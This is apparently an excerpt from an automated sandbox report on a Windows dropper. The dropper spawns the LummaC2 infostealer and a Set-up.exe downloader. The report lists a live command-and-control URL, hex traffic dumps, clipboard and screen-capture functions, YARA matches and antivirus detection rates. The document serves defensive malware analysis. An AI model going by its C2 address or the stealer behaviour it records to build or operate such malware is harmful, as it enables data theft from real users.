6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sun, 12 Jan 2025 16:45:26 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDserver: nginx/1.22.1date: Sun, 12 Jan 2025 16:45:28 GMTcontent-type: text/html; charset=utf-8content-length: 207Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drString found in binary or memory: http://.css
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drString found in binary or memory: http://.jpg
      Source: Set-up.exe.0.drString found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ10
      Source: Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220
      Source: Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220?argument=0
      Source: Set-up.exe, 00000003.00000003.2290027870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2289789125.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290098678.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2291369007.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290126041.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220?argument=0J
      Source: Set-up.exe, 00000003.00000002.2291930851.000000000156E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://home.twelve12vs.top/AvWHJxAVCxPehbRictmJ1736163220http://home.twelve12vs.top/AvWHJxAVCxPehbRi
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drString found in binary or memory: http://html4/loose.dtd
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.drString found in binary or memory: http://timestamp.digicert.com0
      Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
      Source: Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ip
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drString found in binary or memory: https://httpbin.org/ipbefore
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E278A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00E278A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E278A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00E278A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E27A20 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00E27A20

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: jo0PnKm2Lg.exe, type: SAMPLEMatched rule: Detects downloader / injector Author: ditekSHen
      Source: 0.0.jo0PnKm2Lg.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2C0102_2_00E2C010
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF87302_2_00DF8730
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2D0E02_2_00E2D0E0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2B8C52_2_00E2B8C5
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E170D02_2_00E170D0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E198B02_2_00E198B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E098802_2_00E09880
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF38B02_2_00DF38B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E348602_2_00E34860
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1686D2_2_00E1686D
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E090432_2_00E09043
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0C9F02_2_00E0C9F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E251C02_2_00E251C0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2D9A02_2_00E2D9A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E211682_2_00E21168
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E351502_2_00E35150
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF29102_2_00DF2910
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E061002_2_00E06100
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0DAF02_2_00E0DAF0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1B2C32_2_00E1B2C3
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E072C92_2_00E072C9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E02ACB2_2_00E02ACB
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF92F02_2_00DF92F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E14ADF2_2_00E14ADF
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF2AE02_2_00DF2AE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF62E02_2_00DF62E0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E061002_2_00E06100
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF5A802_2_00DF5A80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E172612_2_00E17261
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E022462_2_00E02246
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF8A702_2_00DF8A70
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E312502_2_00E31250
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF42602_2_00DF4260
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0E2302_2_00E0E230
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E34BE02_2_00E34BE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1CB912_2_00E1CB91
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFEB5F2_2_00DFEB5F
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E18B702_2_00E18B70
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2EB402_2_00E2EB40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E08B3B2_2_00E08B3B
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFB3302_2_00DFB330
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFF3302_2_00DFF330
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E054C02_2_00E054C0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2ECD92_2_00E2ECD9
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1C4A02_2_00E1C4A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E10CB12_2_00E10CB1
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0C4B62_2_00E0C4B6
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1BC9A2_2_00E1BC9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33C602_2_00E33C60
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E254702_2_00E25470
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E064442_2_00E06444
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E274202_2_00E27420
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E19C302_2_00E19C30
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E19C102_2_00E19C10
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E21DE02_2_00E21DE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E215EE2_2_00E215EE
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFADD02_2_00DFADD0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2E5F02_2_00E2E5F0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33DC02_2_00E33DC0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0B5A02_2_00E0B5A0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E22DA32_2_00E22DA3
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E335AA2_2_00E335AA
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF4D802_2_00DF4D80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0A5802_2_00E0A580
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DFD5AD2_2_00DFD5AD
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1BD9A2_2_00E1BD9A
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E345602_2_00E34560
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1057D2_2_00E1057D
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF75402_2_00DF7540
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E135002_2_00E13500
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0151F2_2_00E0151F
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E106EF2_2_00E106EF
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33EA02_2_00E33EA0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2CE802_2_00E2CE80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E34E802_2_00E34E80
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF2EB02_2_00DF2EB0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E02E602_2_00E02E60
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E276402_2_00E27640
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1A6482_2_00E1A648
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0DE202_2_00E0DE20
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E16E202_2_00E16E20
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E216072_2_00E21607
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E12FE02_2_00E12FE0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E187F72_2_00E187F7
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1EFB02_2_00E1EFB0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF97B02_2_00DF97B0
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E1B7702_2_00E1B770
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF5F402_2_00DF5F40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E33F402_2_00E33F40
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00DF67702_2_00DF6770
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E247572_2_00E24757
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E18F302_2_00E18F30
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E077032_2_00E07703
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E0E7102_2_00E0E710
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: String function: 00E054B0 appears 110 times
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: String function: 00DF7FE0 appears 45 times
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: String function: 00C4A315 appears 72 times
      Source: jo0PnKm2Lg.exe, 00000000.00000000.2179001382.0000000000F97000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSet-up.exe4 vs jo0PnKm2Lg.exe
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2189192290.000000000171E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs jo0PnKm2Lg.exe
      Source: jo0PnKm2Lg.exeBinary or memory string: OriginalFilenameSet-up.exe4 vs jo0PnKm2Lg.exe
      Source: jo0PnKm2Lg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: jo0PnKm2Lg.exe, type: SAMPLEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
      Source: 0.0.jo0PnKm2Lg.exe.950000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
      Source: Set-up.exe.0.drBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
      Source: classification engineClassification label: mal100.troj.evad.winEXE@5/3@8/2
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2D9A0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,2_2_00E2D9A0
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jo0PnKm2Lg.exe.logJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMutant created: NULL
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Temp\LummaC2.exeJump to behavior
      Source: jo0PnKm2Lg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: jo0PnKm2Lg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: jo0PnKm2Lg.exeReversingLabs: Detection: 76%
      Source: jo0PnKm2Lg.exeVirustotal: Detection: 69%
      Source: unknownProcess created: C:\Users\user\Desktop\jo0PnKm2Lg.exe "C:\Users\user\Desktop\jo0PnKm2Lg.exe"
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe" Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: jo0PnKm2Lg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: jo0PnKm2Lg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: jo0PnKm2Lg.exeStatic file information: File size 8259584 > 1048576
      Source: jo0PnKm2Lg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x7dfe00
      Source: jo0PnKm2Lg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
